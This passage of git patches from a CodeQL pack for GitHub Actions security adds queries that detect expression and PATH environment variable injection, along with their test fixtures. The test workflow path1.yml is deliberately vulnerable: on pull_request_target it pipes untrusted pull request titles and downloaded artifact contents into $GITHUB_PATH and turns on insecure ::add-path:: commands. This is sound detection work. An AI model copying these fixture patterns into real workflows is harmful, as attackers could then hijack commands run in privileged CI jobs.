.github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index 27f6bbca39ce..4913ed2d1008 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -18,8 +18,10 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 1a44d83ddbe4c1868884ac0c4b59c6ba79313851 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 17:58:40 +0200 Subject: [PATCH 205/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 64e2861cf688..64f57746a88c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.11 +version: 0.0.12 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c769ea06d0b8..c796ff5ee40e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.11 +version: 0.0.12 groups: - actions - queries From 46d2bb24e52c2031ed0b95bcb90bd6e15177e2e4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 20 Apr 2024 22:57:22 +0200 Subject: [PATCH 206/707] Fix expression always true query --- ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql | 1 + ql/src/qlpack.yml | 2 +- 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 64f57746a88c..4364e979f919 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.12 +version: 0.0.13 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql index 0a951cbabe1a..b631b5f17b31 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql @@ -15,6 +15,7 @@ import actions from If i where + i.getCondition().matches("%${{%") and i.getConditionStyle() = ["|", ">"] or i.getCondition().matches("%${{%") and diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c796ff5ee40e..6259340a4a69 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.12 +version: 0.0.13 groups: - actions - queries From 9183fb0d808ca243a32634fbbc3a206342e5487d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 20 Apr 2024 23:31:08 +0200 Subject: [PATCH 207/707] Fix expression always true query --- ql/lib/qlpack.yml | 2 +- .../CWE-571/ExpressionIsAlwaysTrue.ql | 10 +++--- ql/src/qlpack.yml | 2 +- .../CWE-571/.github/workflows/test.yml | 35 +++++++++++++++++-- .../CWE-571/ExpressionIsAlwaysTrue.expected | 7 ++++ 5 files changed, 47 insertions(+), 9 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4364e979f919..b557a60a7512 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.13 +version: 0.0.14 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql index b631b5f17b31..58eab4c60222 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql @@ -1,4 +1,6 @@ /** + *: + * * @name If expression always true * @description Expressions used in If conditions with extra spaces are always true. * @kind problem @@ -16,10 +18,10 @@ import actions from If i where i.getCondition().matches("%${{%") and - i.getConditionStyle() = ["|", ">"] - or - i.getCondition().matches("%${{%") and - not i.getCondition().matches("${{%") + ( + not i.getCondition().matches("${{%") or + not i.getCondition().matches("%}}") + ) or count(i.getCondition().splitAt("${{")) > 2 select i, "Expression always evaluates to true" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6259340a4a69..99ecbe14d557 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.13 +version: 0.0.14 groups: - actions - queries diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml index 16b725b5ee8d..30c4dcab9320 100644 --- a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml @@ -8,7 +8,7 @@ jobs: process-pr: runs-on: ubuntu-latest steps: - - name: Test1 + - name: Test 1 if: 1 == 2 run: echo "Test 1 should not be printed" - name: Test 2 @@ -36,8 +36,8 @@ jobs: - name: Test 7 run: echo "Test 7 should not be printed" if: ${{ - 1 == 2 || - 3 == 4 + github.actor == 'torvalds' || + github.actor == 'dependabot[bot]' }} - name: Test 8 @@ -58,3 +58,32 @@ jobs: - name: Test 12 if: " ${{ 1 == 2 }}" run: echo "Test 12 should not be printed" + - name: Test 13 + if: | + 1 == 2 || + 3 == 4 + run: echo "Test 13 should not be printed" + - name: Test 14 + if: >- + ${{( + false || 1 == 2 + )}} + run: echo "Test 14 should not be printed" + - name: Test 15 + if: |- + ${{( + false || 1 == 2 + )}} + run: echo "Test 15 should not be printed" + - name: Test 16 + if: |+ + ${{( + false || 1 == 2 + )}} + run: echo "Test 16 should not be printed" + - name: Test 17 + if: >+ + ${{( + false || 1 == 2 + )}} + run: echo "Test 17 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected new file mode 100644 index 000000000000..a8f068c9cd8d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected @@ -0,0 +1,7 @@ +| .github/workflows/test.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true | +| .github/workflows/test.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test.yml:85:13:88:14 | >+ | Expression always evaluates to true | From ab7196ac5249f1acf711449d8874235fe4d4897b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 09:53:30 +0200 Subject: [PATCH 208/707] Fix FPs in EnvVarInjection --- .../actions/security/EnvVarInjectionQuery.qll | 18 ------------------ .../Security/CWE-077/EnvVarInjection.expected | 12 ------------ .../CWE-077/PrivilegedEnvVarInjection.expected | 16 ---------------- 3 files changed, 46 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index af155e9f3d7b..7d95188cc8cf 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -24,28 +24,10 @@ predicate envVarInjectionFromFileSink(DataFlow::Node sink) { ) } -/** - * Holds if a Run step declares an environment variable, uses it to declare a new env var. - * e.g. - * env: - * BODY: ${{ github.event.comment.body }} - * run: | - * echo "foo=$(echo $BODY)" >> $GITHUB_ENV - */ -predicate envVarInjectionFromEnvSink(DataFlow::Node sink) { - exists(Run run, Expression expr, string varName, string value | - sink.asExpr().getInScopeEnvVarExpr(varName) = expr and - run = sink.asExpr() and - Utils::writeToGitHubEnv(run, _, value) and - value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 - ) -} - private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { envVarInjectionFromExprSink(this) or envVarInjectionFromFileSink(this) or - envVarInjectionFromEnvSink(this) or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 31a550e37565..0c4574a77cbb 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -3,10 +3,6 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -16,13 +12,5 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 527808d10b04..6dbe7bf3c936 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -3,10 +3,6 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -16,14 +12,6 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | @@ -31,7 +19,3 @@ subpaths | .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | -| .github/workflows/test4.yml:21:9:25:6 | Run Step | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:21:9:25:6 | Run Step | Run Step | -| .github/workflows/test4.yml:25:9:31:6 | Run Step | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:25:9:31:6 | Run Step | Run Step | -| .github/workflows/test4.yml:31:9:37:6 | Run Step | .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:31:9:37:6 | Run Step | Run Step | -| .github/workflows/test4.yml:37:9:45:6 | Run Step | .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:37:9:45:6 | Run Step | Run Step | From c31e9dde5e49faa2ab3561a5a13fae573a6bd58e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 16:19:56 +0200 Subject: [PATCH 209/707] Add EnvPathInjection query --- ql/lib/codeql/actions/Ast.qll | 22 ++++++ .../security/EnvPathInjectionQuery.qll | 68 +++++++++++++++++++ .../actions/security/EnvVarInjectionQuery.qll | 2 +- ql/src/Security/CWE-077/EnvPathInjection.ql | 32 +++++++++ .../CWE-077/PrivilegedEnvPathInjection.ql | 28 ++++++++ .../CWE-077/.github/workflows/path1.yml | 33 +++++++++ .../Security/CWE-077/EnvPathInjection.actual | 10 +++ .../Security/CWE-077/EnvPathInjection.qlref | 1 + 8 files changed, 195 insertions(+), 1 deletion(-) create mode 100644 ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll create mode 100644 ql/src/Security/CWE-077/EnvPathInjection.ql create mode 100644 ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8a3dfb7b2a72..ac222741c025 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -89,6 +89,24 @@ module Utils { ) } + bindingset[line] + predicate extractPathAssignment(string line, string value) { + exists(string path | + // single path assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", + 2) and + value = trimQuotes(path) + or + // workflow command assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) + .regexpReplaceAll("^\"", "") + .regexpReplaceAll("\"$", "") and + value = trimQuotes(path) + ) + } + predicate writeToGitHubEnv(Run run, string key, string value) { extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or extractMultilineAssignment(run.getScript(), "ENV", key, value) @@ -98,6 +116,10 @@ module Utils { extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) } + + predicate writeToGitHubPath(Run run, string value) { + extractPathAssignment(run.getScript().splitAt("\n"), value) + } } class AstNode instanceof AstNodeImpl { diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll new file mode 100644 index 000000000000..a5cf2d600f01 --- /dev/null +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -0,0 +1,68 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +private import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.DataFlow + +predicate envPathInjectionFromExprSink(DataFlow::Node sink) { + exists(Expression expr, Run run, string value | + Utils::writeToGitHubPath(run, value) and + expr = sink.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getExpression()) > 0 + ) +} + +predicate envPathInjectionFromFileSink(DataFlow::Node sink) { + exists(Run run, UntrustedArtifactDownloadStep step, string value | + sink.asExpr() = run and + step.getAFollowingStep() = run and + Utils::writeToGitHubPath(run, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) +} + +/** + * Holds if a Run step declares an environment variable, uses it to declare a PATH env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "$BODY" >> $GITHUB_PATH + */ +predicate envPathInjectionFromEnvSink(DataFlow::Node sink) { + exists(Run run, Expression expr, string varname, string value | + sink.asExpr().getInScopeEnvVarExpr(varname) = expr and + run = sink.asExpr() and + Utils::writeToGitHubPath(run, value) and + ( + value = ["$" + varname, "${" + varname + "}", "$ENV{" + varname + "}"] + or + value.matches("$(echo %") and value.indexOf(varname) > 0 + ) + ) +} + +private class EnvPathInjectionSink extends DataFlow::Node { + EnvPathInjectionSink() { + envPathInjectionFromExprSink(this) or + envPathInjectionFromFileSink(this) or + envPathInjectionFromEnvSink(this) or + externallyDefinedSink(this, "envpath-injection") + } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. + */ +private module EnvPathInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof EnvPathInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate the PATH environment variable. */ +module EnvPathInjectionFlow = TaintTracking::Global; diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 7d95188cc8cf..0ae333a56f57 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -10,7 +10,7 @@ predicate envVarInjectionFromExprSink(DataFlow::Node sink) { Utils::writeToGitHubEnv(run, key, value) and expr = sink.asExpr() and run.getAnScriptExpr() = expr and - value.indexOf(expr.getRawExpression()) > 0 + value.indexOf(expr.getExpression()) > 0 ) } diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql new file mode 100644 index 000000000000..19b4cf6c01b1 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql @@ -0,0 +1,32 @@ +/** + * @name PATH Enviroment Variable built from user-controlled sources + * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/envpath-injection + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvPathInjectionQuery +import EnvPathInjectionFlow::PathGraph + +from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink +where + EnvPathInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) +select sink.getNode(), source, sink, + "Potential PATH environment variable injection in $@, which may be controlled by an external user.", + sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql new file mode 100644 index 000000000000..e9f55d1cbb24 --- /dev/null +++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql @@ -0,0 +1,28 @@ +/** + * @name PATH Enviroment Variable built from user-controlled sources + * @description Building the PATH environment variable from user-controlled sources may alter the execution of following system commands + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/privileged-envpath-injection + * @tags actions + * security + * external/cwe/cwe-077 + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.security.EnvPathInjectionQuery +import EnvPathInjectionFlow::PathGraph + +from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink +where + EnvPathInjectionFlow::flowPath(source, sink) and + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) +select sink.getNode(), source, sink, + "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.", + sink, sink.getNode().toString() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml new file mode 100644 index 000000000000..d22f09c03bdb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml @@ -0,0 +1,33 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + + - run: echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $(echo "$PATHINJ") >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $PATHINJ >> $GITHUB_PATH + - env: + PATHINJ: ${{ github.event.pull_request.title }} + run: echo ${PATHINJ} >> $GITHUB_PATH + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + path: foo + - run: echo "$(cat foo/bar)" >> $GITHUB_PATH + - env: + ACTIONS_ALLOW_UNSECURE_COMMANDS: true + PATHINJ: ${{ github.event.pull_request.title }} + run: echo "::add-path::$PATHINJ" + + + + diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual new file mode 100644 index 000000000000..6d9801ccd819 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual @@ -0,0 +1,10 @@ +edges +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:9:26:6 | Run Step | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:26:9:29:41 | Run Step | +nodes +| .github/workflows/path1.yml:11:21:11:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/path1.yml:25:9:26:6 | Run Step | semmle.label | Run Step | +| .github/workflows/path1.yml:26:9:29:41 | Run Step | semmle.label | Run Step | +subpaths +#select diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref new file mode 100644 index 000000000000..ab36454942e0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjection.ql From ef9583a92171ad1c8880e4200955613d98103d19 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 16:20:36 +0200 Subject: [PATCH 210/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b557a60a7512..94df84766b55 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.14 +version: 0.0.15 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 99ecbe14d557..60e21004b842 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.14 +version: 0.0.15 groups: - actions - queries From 61976c684eadace821972df4519516a202b83f56 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 23:28:58 +0200 Subject: [PATCH 211/707] Lower privilege checks to Jobs --- .github/action/src/codeql.ts | 7 +++ action.yml | 35 ++++++++++- 